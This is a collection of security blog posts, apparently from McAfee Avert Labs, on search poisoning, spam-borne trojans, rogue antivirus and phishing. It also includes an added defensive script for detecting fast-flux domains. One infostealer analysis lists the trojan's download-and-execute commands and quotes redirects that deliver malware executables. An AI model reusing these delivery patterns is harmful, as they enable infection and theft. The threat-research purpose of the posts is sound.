    Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributors have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase, and the top Google results are malicious URLs. We first noticed this on the evening of April 1, when we first read the story and were curious, and our first take was “Wow, they are fast.” We watched the evolution of the number of Google results that presented malware over the course of April 2. The last we checked, even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

    Google Search Results

    The search results don’t look so threatening, but if you click on the first few URLs, you’ll find differently. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

    Quite a bad site indeed!

    Misleading Searches Lead to Porn and Malware!!!

    These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

    This example is quite typical of what you’ll see next when you click: a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

    Rogue AV Sure Does Look Real!!!

    So what about that 1969 Rybovich? What about further curiosity-based Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click through to a link, does the content look like what you expected, or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed to red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

    McAfee Debuts ‘Combating Threats’ Series

    McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

    UPDATE MARCH 17th

    Apologies for the busted links yesterday. All seem to be resolving fine now.

    Breaking News: Waledac Terror Attack in a City Near You

    Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

    Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example of what a user from New York would see; other users would see the same message but with their local city being “attacked”:

    The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

    The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

    The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspecting users into following their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

    Democrats.org Cans the Spam

    Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results to lead people to malware. It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time. Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

    In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas. Some of this is obvious from the formatting of the spam. The terms themselves also vary: some appear in a more dictionary style, others are more focused on current events, and others still are rather uncommon. The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems. There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

    Democrats.org Blog Spam Contributes to Google Search Poisoning

    The other day I blogged about Google Trends being abused to serve malware. The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results. Shortly thereafter it appeared that Google took action against that attack. Indeed, a Google spokesperson confirmed that idea.

    Today, Brian Krebs blogged on a separate story, but mentioned that while searching for a related term (pifts.exe), Google returned a poisoned link high on the results list. After doing a little searching I discovered that the relevant term did seem to appear on Google’s top 100 search terms for a brief period. However, the other terms I checked on Google Trends did not yield high-ranked poisoned links as before. But I did come across a potential source for the page-rank manipulation aspects of these attacks: www.democrats.org, which is “Paid for by the Democratic National Committee” and linked to from www.barackobama.com.

    It turns out that this high-ranking website has a community blog feature that allows anyone to create a blog and post whatever they want. Attackers have flooded this forum with bogus posts and thousands of links for more than a month.

    Blog spam such as this is not anything new. However, this highlights one significant effect of such spam and underlines the cause-and-effect relationship of security on the web.

    Web searches are immensely useful and quite powerful.
    Web 2.0, where a community of users contributes content for the betterment of the community can be a great thing.
    But combined, a bad apple (or thousands) doesn’t just hurt the community; it can hurt a significant portion of the Web itself.

    McAfee Monthly Spam Report for March

    The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

    • Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.
    • Replica-watch spam has taken over the number one position for holiday spam.
    • Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?
    • Putting a dollar value on productivity lost due to spam.

    The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

    Malware Riding on the Tides of the Economic Crisis

    A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys want exactly to fool people trying to save some money these days. Spam mails promoting bargains that could help in the recession are hitting inboxes right now.

    When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

    After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

    In economically hard times, the malware authors do not rely only on clever and timely social engineering; they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geolocation services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and inserts the actual location into the website text. When a victim sees coupons for exactly his town, this increases the appeal of the bargain list.

    As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

    Cybercrime, Online Threats, and the Recession

    As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

    A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

    Our Main Threat Predictions/Trends for 2009:

    • Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

    • Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

    • Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

    • Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

    • Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

    • More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

    • Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

    • Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

    • An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

    • More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

    • Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

    • McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

    • New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

    In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

    ‘Love’ Is in the Air

    As the tradition of Valentine’s Day approaches, so does another tradition: Valentine’s Day-themed spam that leads to malware. At McAfee Avert Labs we think everyone by now should know not to click on unlikely links to “love letters” and similar attractions. But we go on doing so. I guess love really does make us blind.  

    By looking at the number of times we see the word valentine in spam, we can see how the spammers pump up the volume in the run-up to February 14. The following graph shows results for the month of January.

    The current wave of Valentine’s Day spam contains links to domains that carry the Waledac Trojan. We are currently monitoring about 100 of these infected domains. Each of the domains is fast-fluxed, so there are hundreds of nameservers and thousands of IP addresses involved. (For more on Waledac, see the recent post from my colleague François Paget.)

    Many of the Waledac techniques and features are very similar to those of the well-known Nuwar/Storm Trojan. At this time last year Nuwar was pumping out Valentine’s spam that looked like this:

    And today Waledac spam looks like this:

    Subjects such as “Deeply in love with you,” “I Knew I Loved You,” and “I Love Being In Love With You,” followed by a short URL in the body are typical of these attempts, which point to sites that offer a little Valentine’s malware. By all means send love notes to your honey before and on Valentine’s Day, but don’t fall for these transparent, annual attempts that lead only to tears.   

    (Thanks to my colleagues Kevin McGhee and Dmitry Gryaznov for their contributions.)

    Chinese Zombie Count Falls but Still Outnumbers Those in U.S.

    China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

    The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast number of computers that had been controlled as zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

    Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

    Clearly, money and profit are still the driving forces for malware and spam these days.

    The Month of Valentine’s Spam

    For those who think the holidays always start too early, guess what? It is time to get your Valentine’s on. Well, at least spammers think so. Avert Labs started seeing Valentine-themed spam on January 22, and it has been increasing steadily since. Currently we are tracking Valentine’s spam at between 1 percent and 2 percent of the total email sent on a daily basis.

    Typical subjects we are seeing include “Deeply in love with you,” “I knew I loved you,” and “I love being with you.” A sample email of the “Only you in my heart” spam is shown below.

    Only you in my heart!

    Once the reader opens the email a URL is available to click on. It’s not surprising that the URL points to a site that contains malware. The display seen below entices the viewer to click on one of the hearts. The binary file meandyou.exe is downloaded if a heart is selected.

    Me and You Malware!

    Spurred on by this new outbreak of Valentine’s spam, overall spam volumes continue to climb back to pre-McColo-takedown levels. Spam in January of this year is within 10 percent of spam from last January, and within the last few days spam is within 20 percent of pre-takedown levels. Spam reached record highs last March, and with spammers getting back online and the lure of love in the air, it may be just a matter of time until new record levels are set.

    Hoax or Not, Treat It the Same

    Late last year, my sister forwarded to me an email that foretold great evil and destruction should anyone open an email with a “Happy New Year” greeting for a subject. The email begged us to save the world by forwarding it to everyone we know. She wanted to know if she should believe it.

    More recently I got something similar, this one warning that a deadly email will have a subject concerning President Barack Obama’s acceptance speech. This one added an air of authenticity by claiming that a popular hoax-tracking site has verified the details to be true. Hoax or not, I rarely read past the subject line of these types of emails, and I never forward them to others. Here are my reasons why:

    • Thousands of mass-mailing worms have been discovered, and new ones are found every day. Each one carries multiple variants of the email it sends out. I would never remember every subject and message that I need to avoid.
    • Verifying the veracity of a virus warning doesn’t do you any good. Say you have an email that warns you not to open an attachment if the subject is “blahblah”, and the attachment name is “blah.exe.” Then everyone declares this email a hoax, not real, nothing to worry about. Does that mean if you do receive an email that matches the description of the “hoax,” that it’s safe to open? Of course not! This is exactly what happened with the AOL4FREE hoax. It started out as a hoax, then someone had the bright idea of using the information from that hoax to send out a real Trojan horse.
    • There’s already too much spam going around. 
    • Security is a lucrative business, and players in this industry are just as publicity-hungry as any. If a virus was a real and significant threat, you’ll find your friendly neighborhood security expert in every media outlet talking about it. So just watch or read the news.
    • Every holiday or significant world event is inevitably followed by emails containing a message about that event and carrying a nasty payload. Everyone should learn to expect this already. It’s called social engineering.
    • Rather than reading through all the virus warnings, it’s easier and much more effective to keep in mind a fixed list of simple tips.

    Valentine’s day is coming up. You don’t need a friend of a friend to warn you that pretty soon you’ll be getting a suspicious email love letter. ;)

    The McAfee 2009 Threat Predictions

    Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

    Threats Hide in the Cloud
    Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

    Personalized Threats Speak Your Language
    Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

    Malware Targets Consumer Devices
    McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

    The Rogue Web and Malvertising
    Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

    McColo: The Effects of a Takedown
    Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

    Download the full report from our whitepaper page here.

    Don’t worry, Obama did not refuse to be a president!

    In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

    Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

    Let me add that if you are lured into this trap and are using an inadequately protected PC, you will be infected by malware we detect as W32/Waledac.gen.b.

    This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.
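Fast-flux hosting, as used by the Waledac domains mentioned in the Valentine’s post and again here, shows up in DNS as very short TTLs, an A-record set that changes on almost every lookup, and addresses scattered across unrelated networks. The following is an added example (not McAfee’s code) of the kind of heuristic a defender can run over resolver logs; the lookups are constructed, the 10.x.x.x addresses stand in for real flux agents, /16 prefix diversity is used as a stand-in for ASN diversity, and the thresholds are assumptions to tune against your own traffic.

```python
"""Heuristic fast-flux detection over a series of DNS lookups (added example, constructed data)."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Lookup:
    """One observed A-record answer for a domain (constructed, not captured traffic)."""
    domain: str
    ttl: int
    a_records: List[str]


def _churn(lks: List[Lookup]) -> float:
    """Share of A records in the 2nd..nth lookups that were never returned by an earlier lookup."""
    seen = set(lks[0].a_records)
    new = total = 0
    for lk in lks[1:]:
        for ip in lk.a_records:
            total += 1
            if ip not in seen:
                new += 1
                seen.add(ip)
    return new / total if total else 0.0


def summarize(lookups: List[Lookup]) -> Dict[str, dict]:
    """Aggregate per-domain features that separate flux networks from ordinary (even CDN) hosting."""
    by_domain: Dict[str, List[Lookup]] = defaultdict(list)
    for lk in lookups:
        by_domain[lk.domain].append(lk)
    stats = {}
    for domain, lks in by_domain.items():
        ips = {ip for lk in lks for ip in lk.a_records}
        # /16 prefix spread approximates "how many distinct networks" when no ASN data is at hand.
        prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips}
        stats[domain] = {
            "lookups": len(lks),
            "unique_ips": len(ips),
            "unique_prefixes": len(prefixes),
            "min_ttl": min(lk.ttl for lk in lks),
            "churn": _churn(lks),
        }
    return stats


def is_fast_flux(s: dict, max_ttl: int = 300, min_ips: int = 10,
                 min_prefixes: int = 5, min_churn: float = 0.5) -> bool:
    """Assumed thresholds. A short TTL alone is not evidence (CDNs use short TTLs too);
    the flux signal is churn plus network spread on top of the short TTL."""
    return (s["min_ttl"] <= max_ttl and s["unique_ips"] >= min_ips
            and s["unique_prefixes"] >= min_prefixes and s["churn"] >= min_churn)


def classify(lookups: List[Lookup]) -> Dict[str, bool]:
    return {domain: is_fast_flux(s) for domain, s in summarize(lookups).items()}


# Constructed observations: six lookups of a flux domain, each answered by four fresh agents
# in four different /16s; a CDN-style name with a short TTL but a stable pair of addresses;
# and a plain static host.
FLUX_LOOKUPS = [
    Lookup("valentine-flux.example", 0, [f"10.{4 * i + k}.{k + 1}.{i + 7}" for k in range(4)])
    for i in range(6)
]
CDN_LOOKUPS = [Lookup("cdn-site.example", 60, ["10.200.1.10", "10.200.1.11"]) for _ in range(6)]
STATIC_LOOKUPS = [Lookup("static-site.example", 3600, ["10.99.0.5"])]
SAMPLE = FLUX_LOOKUPS + CDN_LOOKUPS + STATIC_LOOKUPS

if __name__ == "__main__":
    for domain, s in summarize(SAMPLE).items():
        print(domain, s, "FAST-FLUX" if is_fast_flux(s) else "ok")
```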

    Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

    McAfee Monthly Spam Report Debuts

    Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

    Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

    Political Spam
    Tax Relief Junk Mail
    Unemployment and Diploma Spam Increases
    Christmas E-Cards

    As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

    Google Code Project Abused by Spammers

    Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

    google code pic

    Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

    The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

    Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. ;) The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

    The porntube site is also host to a number of other related sites such as fake anti-anything software:

    google code net pic

    The codec download site, which is in Latvia, also hosts a number of related sites:

    google code net pic

    The Google Code project owner has a few other projects of a similar nature, too.

    A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

    …perhaps I should start consulting on this sort of thing ;)

    Anybody suffering déjà vu? “/in.cgi” should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

    Happy new year to all!

    One Hacker May Conceal Another

    The current crisis in Gaza between Palestinians and Israelis marks a renewal of web-defacement activities. Various Moroccan hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

    This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

    On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

    On the defaced page, one attacker–whose email address is m0×0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

    But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

    Speaking with the discoverers of this identity theft attempt and looking at the code, I noted the stolen data were sent to the same m0×0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As a result of some searches I made today, I would not be surprised if this second guy (if he is not the same as the first) was also involved in some fake auction operations.

    Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

New Spam Circulating Fake Wire Transfer Statements

Today a new downloader trojan is being spammed widely. The spam message is crafted to look like a reply to a wire-transfer inquiry the victim supposedly sent.

    spam message

When a user runs “bank_statement.scr” from the attached zip file, it downloads the BackDoor-DSG trojan while, as a decoy, fetching a harmless PDF document from a legitimate site in the background and opening it. The PDF has nothing to do with a wire transfer.

decoy pdf file

The trojan file is repacked for each message, so no two samples are identical. This time the malware authors are also varying the resource sections of the PE files, such as the icons and the version-information properties.

For example, we observed the following icons:

    Icons

    Other resources:

File Description:

    • Auto-reader Module
    • Reader_Module
    • Adobe Reader HSMC
    • Adodb_SSL_reader

    Translation:

    • English
    • Spanish
    • Korean

    CompanyName:

    • Adobe
    • ADOBE

These crafted resources, like the malicious code itself, are the product of server-side polymorphism intended to evade anti-virus detection. McAfee Avert Labs detects the current wave of the downloader as the BackDoor-DSG.dldr trojan, and the dropped files as BackDoor-DSG, with DAT 5474 or later.

    From Fake Banking to Regionally Targeted Malware

From fake online banking to regionally targeted celeb porn: that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started promoting a fake “Bank of America” web site, announcing a change to the online banking interface to its “customers.” So that these “customers” can have a quick look at the “demo” page, a preview link is provided, as shown in the sample spam mail:

    Example of fake banking spam

Users who follow the lure by clicking the link are presented with a fake banking web site that uses the well-known missing-codec trick: the page claims an additional component must be installed before the site or a video will work. This time it is a supposed update for “Adobe Flash Player” that is required for the “demo page” to work. The update is, of course, not legitimate software but a trojan.

A quick look under the trojan’s hood shows that it not only installs a rootkit but also harvests private information from the infected computer. The data is exfiltrated to a server via HTTP POST requests and may ultimately be sold or used to spread the attackers’ malware further.

    The embedded rootkit is written to harddisk once the trojan is executed – the rootkit driver’s Portable Executable header can be seen in the screenshot below.

The harvested information includes POP3, IMAP and FTP server credentials as well as credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan can also receive and execute commands from the host it phones home to, so its behaviour may change and “improve” at any time.

    The list of commands currently understood by this variant of the trojan is as follows:

    • “VER” – sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
    • “EXE” – updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
    • “DL” – downloads an executable from the Internet (but doesn’t run it)
    • “DL_EXE” – downloads and runs an executable from the Internet
    • “DL_EXE_ST” – downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
    • “REBOOT” – forces the computer to reboot

Just yesterday an additional spam run targeting Swiss Internet users was reported by MELANI, the Swiss Reporting and Analysis Centre for Information Assurance. The mail, written in German, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” and “Britney Spears in front of porn camera – scandal”. Following any link in the mail directs the user to one of many malicious domains showing pages similar to the one below.

Just as on the fake banking site above, the videos on this celeb page supposedly will not play without a codec: too bad! This time the user is offered a high-definition video plugin named “Adobe Player HD plugin”. Again, this is no codec but a trojan whose job is to download further malware. What is noteworthy about this downloader is that it contacts a web server running a traffic management system: depending on the user’s geo-location, different malware is delivered. While, for instance, a user from Germany is sent a file called “de.exe”, …

    HTTP/1.1 302 Found
    Date: Wed, 10 Dec 2008 15:33:58 GMT
    Server: Apache/2
    Set-Cookie: …
    Location: http://***-*****.com/de.exe
    Vary: Accept-Encoding,User-Agent
    Content-Type: text/html

    … a user from Switzerland will get “305.exe”:

    HTTP/1.1 302 Found
    Date: Wed, 10 Dec 2008 15:39:48 GMT
    Server: Apache/2
    Set-Cookie: …
    Location: http://***-*****/305.exe
    Vary: Accept-Encoding,User-Agent
    Content-Type: text/html

Comparing the malware currently spread by the malicious host shows that Swiss residents receive a variant of the same “Infostealer” family seen in the “Bank of America” campaign above, while users from Germany receive a spam bot instead. So spam mails are sent from victims in one country, and information is stolen from the computers of victims in another.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”; additional coverage is in the 5461 DATs.

    Click The Link Below: The Bad Habits That Create New Victims Of Online Fraud

    Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today, you’re likely to look at someone who’s never been on the Internet as an alien life form, many new users are surprisingly logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has proven to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complaints received, the kind of scam that would give your common sense a chance to flex – Nigerian 419 scams – represented a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email-based scams, and seeks to elicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit identity theft. Phishing is a smoke-and-mirrors trick designed to fool you into thinking you’re logging into your bank’s or credit card company’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes made up over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004 only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

    It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

    Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

    Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 

     

    Click This Link

    After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

    Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

    Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.

     

    Paste This Link

